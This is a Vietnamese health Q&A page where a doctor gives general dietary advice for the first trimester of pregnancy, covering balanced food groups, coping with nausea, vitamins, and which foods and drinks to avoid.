  Chế độ ăn trong thời gian 3 tháng đầu mang thai, cần đảm bảo đủ 4 nhóm thực phẩm: nhóm tinh bột (gạo, mì, ngô, khoai, sắn,…), nhóm chất đạm (thịt, cá, trứng, sữa, tôm cua, đậu, đỗ,..), nhóm chất béo (dầu, mỡ, lạc, vừng,…), nhóm vitamin và chất khoáng, chất xơ (hoa quả chín, rau xanh,…). Điều quan trọng là cần ăn cân đối các loại thực phẩm. Nếu bạn có triệu chứng nghén và “sợ” loại thực phẩm nào thì cố gắng thay đổi bằng thực phẩm khác cùng nhóm, nhằm đảm bảo đủ thành phần dinh dưỡng cho bữa ăn.

  Trường hợp cơ thể khoẻ mạnh thì chỉ cần tăng chút ít so với chế độ ăn thông thường, nhưng tình huống cơ thể gầy yếu, suy nhược thì cố gắng bổ sung nhiều hơn để tăng cường sức khoẻ, bù đắp sự thiếu hụt của cơ thể nhưng nên chia nhỏ khẩu phần ăn thành nhiều bữa để cơ thể dễ hấp thu.

  Các chế độ được khuyến khích trong khi mang bầu gồm: uống nhiều nước, bổ sung vitamin (A, D, K, C,…) và khoáng chất (canxi, acid folic, sắt,…). Nhưng cũng lưu ý cần tránh: tránh ăn mặn, tránh ăn ngọt nhiều, tránh chất kích thích (rượu, bia, chè, cà phê,…), tránh các loại nước có ga, đồ giải khát công nghiệp, không ăn thức ăn sống, chưa nấu chín…

  Thân mến!


  Chào bạn!

  Theo thông tin bạn mô tả thì bạn đang giai đoạn 3 tháng đầu của thai kỳ, ở giai đoạn này phần lớn các “bà bầu” có triệu chứng nghén, có thể mức độ... Xem thêm
cảm on bac sy
cảm on bac sy

Trả lời

Nhận xét về Nguyễn Trương Minh Thế

Bạn đã sử dụng dịch vụ của Nguyễn Trương Minh Thế ? Hãy chia sẻ cảm nhận của bạn với cộng đồng.

Nếu bạn có câu hỏi về sức khỏe và chuyên môn, vui lòng chuyển sang trang Hỏi Bác sĩ để được tư vấn miễn phí.